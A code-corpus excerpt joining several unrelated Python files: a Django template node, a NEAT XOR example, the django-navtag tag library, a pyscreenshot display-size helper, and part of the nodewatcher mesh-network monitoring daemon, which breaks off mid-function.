self.args = args
self.kwargs = kwargs
self.template = template
self.asvar = asvar
def render(self, context):
def resolve(v, context):
if unicode(v)==u"False": return False
elif unicode(v)==u"True": return True
elif unicode(v)==u"None": return None
else:
return v.resolve(context)
args = [arg.resolve( context ) for arg in self.args]
kwargs = dict( [( smart_str( k, 'ascii' ), resolve(v, context) ) for k, v in self.kwargs.items()] )
if isinstance(self.template, FilterExpression):
kwargs['TEMPLATE']=get_template(self.template.resolve( context ))
if isinstance(self.template, NodeList):
kwargs['TEMPLATE']=self.template
if not self.asvar:
return self.value(context, *args, **kwargs)
context[self.asvar]=self.value(context, *args, **kwargs)
return ""
def value(self, context, *args, **kwargs):
return ""
| lgpl-3.0 | -5,177,239,194,537,481,000 | 37.808989 | 107 | 0.516503 | false |
machinebrains/neat-python | examples/xor/xor2.py | 1 | 1861 | """ 2-input XOR example """
from __future__ import print_function
from neatsociety import nn, population, statistics, visualize
# Network inputs and expected outputs.
xor_inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
xor_outputs = [0, 1, 1, 0]
def eval_fitness(genomes):
for g in genomes:
net = nn.create_feed_forward_phenotype(g)
sum_square_error = 0.0
for inputs, expected in zip(xor_inputs, xor_outputs):
# Serial activation propagates the inputs through the entire network.
output = net.serial_activate(inputs)
sum_square_error += (output[0] - expected) ** 2
# When the output matches expected for all inputs, fitness will reach
# its maximum value of 1.0.
g.fitness = 1 - sum_square_error
pop = population.Population('xor2_config')
pop.run(eval_fitness, 300)
print('Number of evaluations: {0}'.format(pop.total_evaluations))
# Display the most fit genome.
winner = pop.statistics.best_genome()
print('\nBest genome:\n{!s}'.format(winner))
# Verify network output against training data.
print('\nOutput:')
winner_net = nn.create_feed_forward_phenotype(winner)
for inputs, expected in zip(xor_inputs, xor_outputs):
output = winner_net.serial_activate(inputs)
print("expected {0:1.5f} got {1:1.5f}".format(expected, output[0]))
# Visualize the winner network and plot/log statistics.
visualize.plot_stats(pop.statistics)
visualize.plot_species(pop.statistics)
visualize.draw_net(winner, view=True, filename="xor2-all.gv")
visualize.draw_net(winner, view=True, filename="xor2-enabled.gv", show_disabled=False)
visualize.draw_net(winner, view=True, filename="xor2-enabled-pruned.gv", show_disabled=False, prune_unused=True)
statistics.save_stats(pop.statistics)
statistics.save_species_count(pop.statistics)
statistics.save_species_fitness(pop.statistics)
| bsd-3-clause | -3,919,349,984,448,292,400 | 35.490196 | 112 | 0.709833 | false |
SmileyChris/django-navtag | django_navtag/templatetags/navtag.py | 1 | 5170 | from django import template
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
register = template.Library()
class Nav(object):
def __init__(self, tree=None, root=None):
self._root = root or self
self._tree = tree or {}
def __getitem__(self, key):
return Nav(self._tree[key], root=self._root)
def __str__(self):
return mark_safe(str(self._text))
def __bool__(self):
return bool(self._tree)
def _get_text(self):
if hasattr(self._root, "_text_value"):
return self._root._text_value
return self._tree
def _set_text(self, value):
self._root._text_value = value
_text = property(_get_text, _set_text)
def clear(self):
self._tree = {}
def update(self, *args, **kwargs):
self._tree.update(*args, **kwargs)
class NavNode(template.Node):
def __init__(self, item=None, var_for=None, var_text=None):
self.item = item
self.var_name = var_for or "nav"
self.text = var_text
def render(self, context):
first_context_stack = context.dicts[0]
nav = first_context_stack.get(self.var_name)
if nav is not context.get(self.var_name):
raise template.TemplateSyntaxError(
"'{0}' variable has been altered in current context".format(
self.var_name
)
)
if not isinstance(nav, Nav):
nav = Nav()
# Copy the stack to avoid leaking into other contexts.
new_first_context_stack = first_context_stack.copy()
new_first_context_stack[self.var_name] = nav
context.dicts[0] = new_first_context_stack
if self.text:
nav._text = self.text.resolve(context)
return ""
# If self.item was blank then there's nothing else to do here.
if not self.item:
return ""
if nav:
# If the nav variable is already set, don't do anything.
return ""
item = self.item.resolve(context)
item = item and smart_str(item)
value = True
if not item:
item = ""
for part in reversed(item.split(".")):
new_item = {}
new_item[part] = value
value = new_item
nav.clear()
nav.update(new_item)
return ""
def __repr__(self):
return "<Nav node>"
@register.tag
def nav(parser, token):
"""
Handles navigation item selection.
Example usage::
{# Set the context so {{ nav.home }} (or {{ mynav.home }}) is True #}
{% nav "home" %} or {% nav "home" for mynav %}
The most basic (and common) use of the tag is to call ``{% nav [item] %}``,
where ``[item]`` is the item you want to check is selected.
By default, this tag creates a ``nav`` context variable. To use an
alternate context variable name, call ``{% nav [item] for [var_name] %}``.
Your HTML navigation template should look something like::
{% block nav %}
<ul class="nav">
<li{% if nav.home %} class="selected"{% endif %}>
<a href="/">Home</a>
</li>
<li{% if nav.about %} class="selected"{% endif %}>
<a href="/about/">About</a>
</li>
</ul>
{% endblock %}
To override this in a child template, you'd do::
{% include "base.html" %}
{% load nav %}
{% block nav %}
{% nav "about" %}
{{ block.super }}
{% endblock %}
This works for multiple levels of template inheritance, due to the fact
that the tag only does anything if the ``nav`` context variable does not
exist. So only the first ``{% nav %}`` call found will ever be processed.
As a shortcut, you can use a ``text`` argument and then just reference the
variable rather than query it with an ``{% if %}`` tag::
{% nav text ' class="active"' %}
<ul class="nav">
<li{{ nav.home }}><a href="/">Home</a></li>
<li{{ nav.about }}><a href="/about/">About</a></li>
</ul>
To create a sub-menu you can check against, simply dot-separate the item::
{% nav "about_menu.info" %}
This will be pass for both ``{% if nav.about_menu %}`` and
``{% if nav.about_menu.info %}``.
"""
bits = token.split_contents()
ok = True
keys = {"for": False, "text": True}
node_kwargs = {}
while len(bits) > 2:
value = bits.pop()
key = bits.pop()
if key not in keys:
ok = False
break
compile_filter = keys.pop(key)
if compile_filter:
value = parser.compile_filter(value)
node_kwargs["var_{0}".format(key)] = value
if len(bits) > 1:
# Text argument doesn't expect an item.
ok = "text" not in node_kwargs
item = parser.compile_filter(bits[1])
else:
item = None
if not ok:
raise template.TemplateSyntaxError("Unexpected format for %s tag" % bits[0])
return NavNode(item, **node_kwargs)
| mit | 2,733,805,172,510,658,000 | 28.20904 | 84 | 0.544874 | false |
ponty/pyscreenshot | tests/size.py | 1 | 1350 | import os
from easyprocess import EasyProcess
from pyscreenshot.util import platform_is_linux, platform_is_osx, platform_is_win
def display_size_x():
# http://www.cyberciti.biz/faq/how-do-i-find-out-screen-resolution-of-my-linux-desktop/
# xdpyinfo | grep 'dimensions:'
screen_width, screen_height = 0, 0
if not os.environ.get("DISPLAY"):
raise ValueError("missing DISPLAY variable")
xdpyinfo = EasyProcess("xdpyinfo")
xdpyinfo.enable_stdout_log = False
if xdpyinfo.call().return_code != 0:
raise ValueError("xdpyinfo error: %s" % xdpyinfo)
for x in xdpyinfo.stdout.splitlines():
if "dimensions:" in x:
screen_width, screen_height = map(int, x.strip().split()[1].split("x"))
return screen_width, screen_height
def display_size_osx():
from Quartz import CGDisplayBounds
from Quartz import CGMainDisplayID
mainMonitor = CGDisplayBounds(CGMainDisplayID())
return int(mainMonitor.size.width), int(mainMonitor.size.height)
def display_size_win():
from win32api import GetSystemMetrics
return int(GetSystemMetrics(0)), int(GetSystemMetrics(1))
def display_size():
if platform_is_osx():
return display_size_osx()
if platform_is_win():
return display_size_win()
if platform_is_linux():
return display_size_x()
| bsd-2-clause | 3,261,601,400,750,375,400 | 27.723404 | 91 | 0.684444 | false |
galaxor/Nodewatcher | nodewatcher/monitor/monitor.py | 1 | 45662 | #!/usr/bin/python
#
# nodewatcher monitoring daemon
#
# Copyright (C) 2009 by Jernej Kos <[email protected]>
#
# First parse options (this must be done here since they contain import paths
# that must be parsed before Django models can be imported)
import sys, os
from optparse import OptionParser
print "============================================================================"
print " nodewatcher monitoring daemon "
print "============================================================================"
parser = OptionParser()
parser.add_option('--path', dest = 'path', help = 'Path that contains nodewatcher "web" Python module')
parser.add_option('--settings', dest = 'settings', help = 'Django settings to use')
parser.add_option('--olsr-host', dest = 'olsr_host', help = 'A host with OLSR txt-info plugin running (overrides settings file)')
parser.add_option('--stress-test', dest = 'stress_test', help = 'Perform a stress test (only used for development)', action = 'store_true')
parser.add_option('--collect-simulation', dest = 'collect_sim', help = 'Collect simulation data', action = 'store_true')
parser.add_option('--update-rrds', dest = 'update_rrds', help = 'Update RRDs', action = 'store_true')
parser.add_option('--update-rrd-type', dest = 'update_rrd_type', help = 'Update RRD type (refresh, archive, switch_sources)', default = 'refresh')
parser.add_option('--update-rrd-opts', dest = 'update_rrd_opts', help = 'Update RRD options', default = '')
parser.add_option('--reverse-populate', dest = 'reverse_populate', help = 'Reverse populate RRD with data from a database', action = 'store_true')
parser.add_option('--reverse-populate-node', dest = 'rp_node', help = 'Node to populate data for')
parser.add_option('--reverse-populate-graph', dest = 'rp_graph', help = 'Graph type to populate data for')
options, args = parser.parse_args()
if not options.path:
print "ERROR: Path specification is required!\n"
parser.print_help()
exit(1)
elif not options.settings:
print "ERROR: Settings specification is required!\n"
parser.print_help()
exit(1)
elif options.reverse_populate and (not options.rp_node or not options.rp_graph):
print "ERROR: Reverse populate requires node and graph type!\n"
parser.print_help()
exit(1)
# Setup import paths, since we are using Django models
sys.path.append(options.path)
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
# Import our models
from web.nodes.models import Node, NodeStatus, Subnet, SubnetStatus, APClient, Link, GraphType, GraphItem, Event, EventSource, EventCode, IfaceType, InstalledPackage, NodeType, RenumberNotice, WarningCode, NodeWarning, Tweet
from web.generator.models import Template, Profile
from web.nodes import data_archive
from django.db import transaction, models, connection
from django.conf import settings
# Possibly override MONITOR_OLSR_HOST setting with comomand line option
if options.olsr_host:
settings.MONITOR_OLSR_HOST = options.olsr_host
# Import other stuff
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None) or options.stress_test:
from simulator import nodewatcher, wifi_utils
else:
from lib import nodewatcher, wifi_utils
# Setup simulation data collection
nodewatcher.COLLECT_SIMULATION_DATA = options.collect_sim
wifi_utils.COLLECT_SIMULATION_DATA = options.collect_sim
from web.monitor.rrd import *
from web.monitor import graphs
from lib.topology import DotTopologyPlotter
from lib import ipcalc
from time import sleep
from datetime import datetime, timedelta
from traceback import format_exc, print_exc
import pwd
import logging
import time
import multiprocessing
import gc
import struct
if Tweet.tweets_enabled():
from lib import bitly
WORKER_POOL = None
def safe_int_convert(integer):
"""
A helper method for converting a string to an integer.
"""
try:
return int(integer)
except:
return None
def safe_float_convert(value, precision = 3):
"""
A helper method for converting a string to a float.
"""
try:
return round(float(value), precision)
except:
return None
def safe_loadavg_convert(loadavg):
"""
A helper method for converting a string to a loadavg tuple.
"""
try:
loadavg = loadavg.split(' ')
la1min, la5min, la15min = (float(x) for x in loadavg[0:3])
nproc = int(loadavg[3].split('/')[1])
return la1min, la5min, la15min, nproc
except:
return None, None, None, None
def safe_uptime_convert(uptime):
"""
A helper method for converting a string to an uptime integer.
"""
try:
return int(float(uptime.split(' ')[0]))
except:
return None
def safe_date_convert(timestamp):
"""
A helper method for converting a string timestamp into a datetime
object.
"""
try:
return datetime.fromtimestamp(int(timestamp))
except:
return None
def safe_dbm_convert(dbm):
"""
A helper method for converting a string into a valid dBm integer
value. This also takes care of unsigned/signed char conversions.
"""
try:
dbm = safe_int_convert(dbm)
if dbm is None:
return None
if dbm > 127:
# Convert from unsigned char into signed one
dbm = struct.unpack("b", struct.pack("<i", dbm)[0])[0]
return dbm
except:
return None
@transaction.commit_on_success
def check_events():
"""
Check events that need resend.
"""
transaction.set_dirty()
Event.post_events_that_need_resend()
@transaction.commit_on_success
def check_global_statistics():
"""
Graph some global statistics.
"""
transaction.set_dirty()
# Nodes by status
nbs = {}
for s in Node.objects.exclude(node_type = NodeType.Test).values('status').annotate(count = models.Count('ip')):
nbs[s['status']] = s['count']
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
RRA.update(None, RRANodesByStatus, rra,
nbs.get(NodeStatus.Up, 0),
nbs.get(NodeStatus.Down, 0),
nbs.get(NodeStatus.Visible, 0),
nbs.get(NodeStatus.Invalid, 0),
nbs.get(NodeStatus.Pending, 0),
nbs.get(NodeStatus.Duped, 0),
graph = -2
)
# Global client count
client_count = len(APClient.objects.all())
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.update(None, RRAGlobalClients, rra, client_count, graph = -3)
def update_rrd(item):
"""
Updates a single RRD.
"""
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', item.rra))
conf = graphs.RRA_CONF_MAP[item.type]
# Update the RRD
RRA.convert(conf, archive, action = options.update_rrd_type, opts = options.update_rrd_opts, graph = item.pk)
def update_rrds():
"""
Updates RRDs.
"""
# We must close the database connection before we fork the worker pool, otherwise
# resources will be shared and problems will arise!
connection.close()
pool = multiprocessing.Pool(processes = settings.MONITOR_GRAPH_WORKERS)
try:
pool.map(update_rrd, GraphItem.objects.all()[:])
# Don't forget the global graphs
rra_status = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
rra_clients = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.convert(RRANodesByStatus, rra_status, action = options.update_rrd_type, graph = -2)
RRA.convert(RRAGlobalClients, rra_clients, action = options.update_rrd_type, graph = -3)
except:
logging.warning(format_exc())
pool.close()
pool.join()
@transaction.commit_on_success
def check_dead_graphs():
"""
Checks for dead graphs.
"""
GraphItem.objects.filter(dead = False, last_update__lt = datetime.now() - timedelta(minutes = 10)).update(
dead = True,
need_redraw = True
)
# Remove RRDs that need removal
for graph in GraphItem.objects.filter(need_removal = True):
try:
os.unlink(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
except:
pass
GraphItem.objects.filter(need_removal = True).delete()
def generate_new_node_tweet(node):
"""
Generates a tweet when a new node connects to the network.
"""
if not Tweet.tweets_enabled():
return
try:
bit_api = bitly.Api(login=settings.BITLY_LOGIN, apikey=settings.BITLY_API_KEY)
node_link = bit_api.shorten(node.get_full_url())
msg = "A new node %s has just connected to the network %s" % (node.name, node_link)
Tweet.post_tweet(node, msg)
except:
logging.warning("%s/%s: %s" % (node.name, node.ip, format_exc()))
@transaction.commit_on_success
def process_node(node_ip, ping_results, is_duped, peers, varsize_results):
"""
Processes a single node.
@param node_ip: Node's IP address
@param ping_results: Results obtained from ICMP ECHO tests
@param is_duped: True if duplicate echos received
@param peers: Peering info from routing daemon
@param varsize_results: Results of ICMP ECHO tests with variable payloads
"""
transaction.set_dirty()
try:
n = Node.get_exclusive(ip = node_ip)
except Node.DoesNotExist:
# This might happen when we were in the middle of a renumbering and
# did not yet have access to the node. Then after the node has been
# renumbered we gain access, but the IP has been changed. In this
# case we must ignore processing of this node.
return
grapher = graphs.Grapher(n)
oldStatus = n.status
old_last_seen = n.last_seen
# Determine node status
if ping_results is not None:
n.status = NodeStatus.Up
n.rtt_min, n.rtt_avg, n.rtt_max, n.pkt_loss = ping_results
# Add RTT graph
grapher.add_graph(GraphType.RTT, 'Latency', 'latency', n.rtt_avg, n.rtt_min, n.rtt_max)
# Add uptime credit
if n.uptime_last:
n.uptime_so_far = (n.uptime_so_far or 0) + (datetime.now() - n.uptime_last).seconds
n.uptime_last = datetime.now()
else:
n.status = NodeStatus.Visible
# Measure packet loss with different packet sizes and generate a graph
if ping_results is not None and varsize_results is not None:
losses = [n.pkt_loss] + varsize_results
grapher.add_graph(GraphType.PacketLoss, 'Packet Loss', 'packetloss', *losses)
if is_duped:
n.status = NodeStatus.Duped
NodeWarning.create(n, WarningCode.DupedReplies, EventSource.Monitor)
# Generate status change events
if oldStatus in (NodeStatus.Down, NodeStatus.Pending, NodeStatus.New) and n.status in (NodeStatus.Up, NodeStatus.Visible):
if oldStatus in (NodeStatus.New, NodeStatus.Pending):
n.first_seen = datetime.now()
if n.node_type == NodeType.Wireless:
generate_new_node_tweet(n)
Event.create_event(n, EventCode.NodeUp, '', EventSource.Monitor)
elif oldStatus != NodeStatus.Duped and n.status == NodeStatus.Duped:
Event.create_event(n, EventCode.PacketDuplication, '', EventSource.Monitor)
# Add olsr peer count graph
grapher.add_graph(GraphType.OlsrPeers, 'Routing Peers', 'olsrpeers', n.peers)
# Add LQ/ILQ/ETX graphs
if n.peers > 0:
etx_avg = lq_avg = ilq_avg = 0.0
for peer in n.get_peers():
lq_avg += float(peer.lq)
ilq_avg += float(peer.ilq)
etx_avg += float(peer.etx)
lq_graph = grapher.add_graph(GraphType.LQ, 'Average Link Quality', 'lq', ilq_avg / n.peers, lq_avg / n.peers)
etx_graph = grapher.add_graph(GraphType.ETX, 'Average ETX', 'etx', etx_avg / n.peers)
for peer in n.get_peers():
# Link quality
grapher.add_graph(
GraphType.LQ,
'Link Quality to {0}'.format(peer.dst),
'lq_peer_{0}'.format(peer.dst.pk),
peer.ilq,
peer.lq,
name = peer.dst.ip,
parent = lq_graph
)
# ETX
grapher.add_graph(
GraphType.ETX,
'ETX to {0}'.format(peer.dst),
'etx_peer_{0}'.format(peer.dst.pk),
peer.etx,
name = peer.dst.ip,
parent = etx_graph
)
n.last_seen = datetime.now()
# Attempt to fetch data from nodewatcher
info = nodewatcher.fetch_node_info(node_ip)
# XXX This is an ugly hack for server-type nodes, but it will be fixed by modularization
# rewrite anyway, so no need to make it nice
if n.node_type == NodeType.Server and info is not None and 'iface' in info:
try:
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
grapher.add_graph(
GraphType.Traffic,
'Traffic - {0}'.format(iid),
'traffic_{0}'.format(iid),
iface['up'],
iface['down'],
name = iid
)
except:
pass
info = None
# Check if we have fetched nodewatcher data
if info is not None and 'general' in info:
try:
oldUptime = n.uptime or 0
oldChannel = n.channel or 0
oldVersion = n.firmware_version
n.firmware_version = info['general']['version']
n.local_time = safe_date_convert(info['general']['local_time'])
n.bssid = info['wifi']['bssid']
n.essid = info['wifi']['essid']
n.channel = nodewatcher.frequency_to_channel(info['wifi']['frequency'])
n.clients = 0
n.uptime = safe_uptime_convert(info['general']['uptime'])
# Treat missing firmware version file as NULL version
if n.firmware_version == "missing":
n.firmware_version = None
# Validate BSSID and ESSID
if n.bssid != "02:CA:FF:EE:BA:BE":
NodeWarning.create(n, WarningCode.BSSIDMismatch, EventSource.Monitor)
try:
if n.essid != n.configured_essid:
NodeWarning.create(n, WarningCode.ESSIDMismatch, EventSource.Monitor)
except Project.DoesNotExist:
pass
if 'uuid' in info['general']:
n.reported_uuid = info['general']['uuid']
if n.reported_uuid and n.reported_uuid != n.uuid:
NodeWarning.create(n, WarningCode.MismatchedUuid, EventSource.Monitor)
if oldVersion != n.firmware_version:
Event.create_event(n, EventCode.VersionChange, '', EventSource.Monitor, data = 'Old version: %s\n New version: %s' % (oldVersion, n.firmware_version))
if oldUptime > n.uptime:
Event.create_event(n, EventCode.UptimeReset, '', EventSource.Monitor, data = 'Old uptime: %s\n New uptime: %s' % (oldUptime, n.uptime))
# Setup reboot mode for further graphs as we now know the node has
# been rebooted
grapher.enable_reboot_mode(n.uptime, old_last_seen)
if oldChannel != n.channel and oldChannel != 0:
Event.create_event(n, EventCode.ChannelChanged, '', EventSource.Monitor, data = 'Old channel: %s\n New channel %s' % (oldChannel, n.channel))
try:
if n.channel != n.profile.channel:
NodeWarning.create(n, WarningCode.ChannelMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
if n.has_time_sync_problems():
NodeWarning.create(n, WarningCode.TimeOutOfSync, EventSource.Monitor)
if 'errors' in info['wifi']:
error_count = safe_int_convert(info['wifi']['errors'])
if error_count != n.wifi_error_count and error_count > 0:
Event.create_event(n, EventCode.WifiErrors, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.wifi_error_count, error_count))
n.wifi_error_count = error_count
if 'net' in info:
loss_count = safe_int_convert(info['net']['losses']) if 'losses' in info['net'] else 0
if loss_count != n.loss_count and loss_count > 1:
Event.create_event(n, EventCode.ConnectivityLoss, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.loss_count, loss_count))
n.loss_count = loss_count
# Check VPN configuration
if 'vpn' in info['net']:
n.vpn_mac = info['net']['vpn']['mac'] or None
try:
offset = -3
unit = 1000
if 'Kbit' in info['net']['vpn']['upload_limit']:
offset = -4
unit = 1
upload_limit = safe_int_convert(info['net']['vpn']['upload_limit'][:offset]) // unit
except TypeError:
upload_limit = None
if n.vpn_mac and n.vpn_mac != n.vpn_mac_conf:
NodeWarning.create(n, WarningCode.VPNMacMismatch, EventSource.Monitor)
try:
if upload_limit != n.profile.vpn_egress_limit:
NodeWarning.create(n, WarningCode.VPNLimitMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
# Parse nodogsplash client information
oldNdsStatus = n.captive_portal_status
if 'nds' in info:
if 'down' in info['nds'] and info['nds']['down'] == '1':
n.captive_portal_status = False
# Create a node warning when captive portal is down and the node has it
# selected in its image generator profile
try:
if n.project.captive_portal and n.has_client_subnet():
NodeWarning.create(n, WarningCode.CaptivePortalDown, EventSource.Monitor)
except Profile.DoesNotExist:
pass
else:
n.captive_portal_status = True
for cid, client in info['nds'].iteritems():
if not cid.startswith('client'):
continue
try:
c = APClient.objects.get(node = n, ip = client['ip'])
except APClient.DoesNotExist:
c = APClient(node = n)
n.clients_so_far += 1
n.clients += 1
c.ip = client['ip']
c.connected_at = safe_date_convert(client['added_at'])
c.uploaded = safe_int_convert(client['up'])
c.downloaded = safe_int_convert(client['down'])
c.last_update = datetime.now()
c.save()
else:
n.captive_portal_status = True
# Check for captive portal status change
if n.has_client_subnet():
if oldNdsStatus and not n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalDown, '', EventSource.Monitor)
elif not oldNdsStatus and n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalUp, '', EventSource.Monitor)
# Generate a graph for number of wifi cells
if 'cells' in info['wifi']:
grapher.add_graph(GraphType.WifiCells, 'Nearby WiFi Cells', 'wificells', safe_int_convert(info['wifi']['cells']) or 0)
# Update node's MAC address on wifi iface
if 'mac' in info['wifi']:
n.wifi_mac = info['wifi']['mac']
# Update node's RTS and fragmentation thresholds
if 'rts' in info['wifi'] and 'frag' in info['wifi']:
n.thresh_rts = safe_int_convert(info['wifi']['rts']) or 2347
n.thresh_frag = safe_int_convert(info['wifi']['frag']) or 2347
# Check node's multicast rate
if 'mcast_rate' in info['wifi']:
rate = safe_int_convert(info['wifi']['mcast_rate'])
if rate != 5500:
NodeWarning.create(n, WarningCode.McastRateMismatch, EventSource.Monitor)
# Check node's wifi bitrate, level and noise
if 'signal' in info['wifi']:
bitrate = safe_int_convert(info['wifi']['bitrate'])
signal = safe_dbm_convert(info['wifi']['signal'])
noise = safe_dbm_convert(info['wifi']['noise'])
snr = float(signal) - float(noise)
grapher.add_graph(GraphType.WifiBitrate, 'WiFi Bitrate', 'wifibitrate', bitrate)
grapher.add_graph(GraphType.WifiSignalNoise, 'WiFi Signal/Noise', 'wifisignalnoise', signal, noise)
grapher.add_graph(GraphType.WifiSNR, 'WiFi Signal/Noise Ratio', 'wifisnr', snr)
# Check for IP shortage
wifi_subnet = n.subnet_set.filter(gen_iface_type = IfaceType.WiFi, allocated = True)
if wifi_subnet and n.clients > max(0, ipcalc.Network(wifi_subnet[0].subnet, wifi_subnet[0].cidr).size() - 4):
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: %s\n Clients: %s' % (wifi_subnet[0], n.clients))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Fetch DHCP leases when available
lease_count = 0
if 'dhcp' in info:
per_subnet_counts = {}
for cid, client in info['dhcp'].iteritems():
if not cid.startswith('client'):
continue
# Determine which subnet this thing belongs to
client_subnet = n.subnet_set.ip_filter(ip_subnet__contains = client['ip'])
if client_subnet:
client_subnet = client_subnet[0]
per_subnet_counts[client_subnet] = per_subnet_counts.get(client_subnet, 0) + 1
else:
# TODO Subnet is not announced by this node - potential problem, but ignore for now
pass
lease_count += 1
# Check for IP shortage
for client_subnet, count in per_subnet_counts.iteritems():
if count > ipcalc.Network(client_subnet.subnet, client_subnet.cidr).size() - 4:
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: {0}\n Leases: {1}' % (client_subnet, count))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Generate a graph for number of clients
if 'nds' in info or lease_count > 0:
grapher.add_graph(GraphType.Clients, 'Connected Clients', 'clients', n.clients, lease_count)
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
if iid not in ('wifi0', 'wmaster0'):
# Check mappings for known wifi interfaces so we can handle hardware changes while
# the node is up and not generate useless intermediate graphs
try:
if n.profile:
iface_wifi = n.profile.template.iface_wifi
if Template.objects.filter(iface_wifi = iid).count() >= 1:
iid = iface_wifi
except Profile.DoesNotExist:
pass
grapher.add_graph(GraphType.Traffic, 'Traffic - %s' % iid, 'traffic_%s' % iid, iface['up'], iface['down'], name = iid)
# Generate load average statistics
if 'loadavg' in info['general']:
n.loadavg_1min, n.loadavg_5min, n.loadavg_15min, n.numproc = safe_loadavg_convert(info['general']['loadavg'])
grapher.add_graph(GraphType.LoadAverage, 'Load Average', 'loadavg', n.loadavg_1min, n.loadavg_5min, n.loadavg_15min)
grapher.add_graph(GraphType.NumProc, 'Number of Processes', 'numproc', n.numproc)
# Generate free memory statistics
if 'memfree' in info['general']:
n.memfree = safe_int_convert(info['general']['memfree'])
buffers = safe_int_convert(info['general'].get('buffers', 0))
cached = safe_int_convert(info['general'].get('cached', 0))
grapher.add_graph(GraphType.MemUsage, 'Memory Usage', 'memusage', n.memfree, buffers, cached)
# Generate solar statistics when available
if 'solar' in info and all([x in info['solar'] for x in ('batvoltage', 'solvoltage', 'charge', 'state', 'load')]):
states = {
'boost' : 1,
'equalize' : 2,
'absorption' : 3,
'float' : 4
}
for key, value in info['solar'].iteritems():
if not value.strip():
info['solar'][key] = None
grapher.add_graph(GraphType.Solar, 'Solar Monitor', 'solar',
info['solar']['batvoltage'],
info['solar']['solvoltage'],
info['solar']['charge'],
states.get(info['solar']['state']),
info['solar']['load']
)
# Generate statistics for environmental data
if 'environment' in info:
for key, value in info['environment'].iteritems():
if not key.startswith('sensor'):
continue
if 'temp' in value:
temp = safe_float_convert(value['temp'])
serial = value['serial']
grapher.add_graph(GraphType.Temperature, 'Temperature ({0})'.format(serial), 'temp_{0}'.format(serial), temp, name = serial)
# XXX UGLY HACK: Some random voltage reports
if 'voltage' in info:
serial = info['voltage']['serial']
voltages = [safe_float_convert(info['voltage'][x].strip()) for x in '1234']
multipliers = [safe_int_convert(info['voltage']['%sm' % x].strip()) for x in '1234']
results = []
for voltage, multiplier in zip(voltages, multipliers):
if voltage is not None:
results.append(voltage * multiplier)
else:
results.append(None)
grapher.add_graph(GraphType.Voltage, 'Voltage ({0})'.format(serial), 'volt_{0}'.format(serial), *results, name = serial)
# Check for installed package versions (every hour)
try:
last_pkg_update = n.installedpackage_set.all()[0].last_update
except:
last_pkg_update = None
if not last_pkg_update or last_pkg_update < datetime.now() - timedelta(hours = 1):
packages = nodewatcher.fetch_installed_packages(n.ip) or {}
# Remove removed packages and update existing package versions
for package in n.installedpackage_set.all():
if package.name not in packages:
package.delete()
else:
package.version = packages[package.name]
package.last_update = datetime.now()
package.save()
del packages[package.name]
# Add added packages
for packageName, version in packages.iteritems():
package = InstalledPackage(node = n)
package.name = packageName
package.version = version
package.last_update = datetime.now()
package.save()
# Check if all selected optional packages are present in package listing
try:
missing_packages = []
for package in n.profile.optional_packages.all():
for pname in package.name.split():
if n.installedpackage_set.filter(name = pname).count() == 0:
missing_packages.append(pname)
if missing_packages:
NodeWarning.create(n, WarningCode.OptPackageNotFound, EventSource.Monitor, details = ("Packages missing: %s" % ", ".join(missing_packages)))
except Profile.DoesNotExist:
pass
# Check if DNS works
if 'dns' in info:
old_dns_works = n.dns_works
n.dns_works = info['dns']['local'] == '0' and info['dns']['remote'] == '0'
if not n.dns_works:
NodeWarning.create(n, WarningCode.DnsDown, EventSource.Monitor)
if old_dns_works != n.dns_works:
# Generate a proper event when the state changes
if n.dns_works:
Event.create_event(n, EventCode.DnsResolverRestored, '', EventSource.Monitor)
else:
Event.create_event(n, EventCode.DnsResolverFailed, '', EventSource.Monitor)
except:
logging.warning("Failed to interpret nodewatcher data for node '%s (%s)'!" % (n.name, n.ip))
logging.warning(format_exc())
NodeWarning.create(n, WarningCode.NodewatcherInterpretFailed, EventSource.Monitor)
n.save()
# When GC debugging is enabled perform some more work
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
gc.collect()
return os.getpid(), len(gc.get_objects())
return None, None
@transaction.commit_on_success
def check_network_status():
"""
Performs the network status check.
"""
# Initialize the state of nodes and subnets, remove out of date ap clients and graph items
Node.objects.all().update(visible = False)
Subnet.objects.all().update(visible = False)
Link.objects.all().update(visible = False)
APClient.objects.filter(last_update__lt = datetime.now() - timedelta(minutes = 11)).delete()
# Reset some states
NodeWarning.objects.all().update(source = EventSource.Monitor, dirty = False)
Node.objects.all().update(warnings = False, conflicting_subnets = False)
# Fetch routing tables from OLSR
try:
nodes, hna = wifi_utils.get_tables(settings.MONITOR_OLSR_HOST)
except TypeError:
logging.error("Unable to fetch routing tables from '%s'!" % settings.MONITOR_OLSR_HOST)
return
# Ping nodes present in the database and visible in OLSR
dbNodes = {}
nodesToPing = []
for nodeIp in nodes.keys():
try:
# Try to get the node from the database
n = Node.get_exclusive(ip = nodeIp)
n.visible = True
n.peers = len(nodes[nodeIp].links)
# If we have succeeded, add to list (if not invalid)
if not n.is_invalid():
if n.awaiting_renumber:
# Reset any status from awaiting renumber to invalid
for notice in n.renumber_notices.all():
try:
rn = Node.objects.get(ip = notice.original_ip)
if rn.status == NodeStatus.AwaitingRenumber:
rn.status = NodeStatus.Invalid
rn.node_type = NodeType.Unknown
rn.awaiting_renumber = False
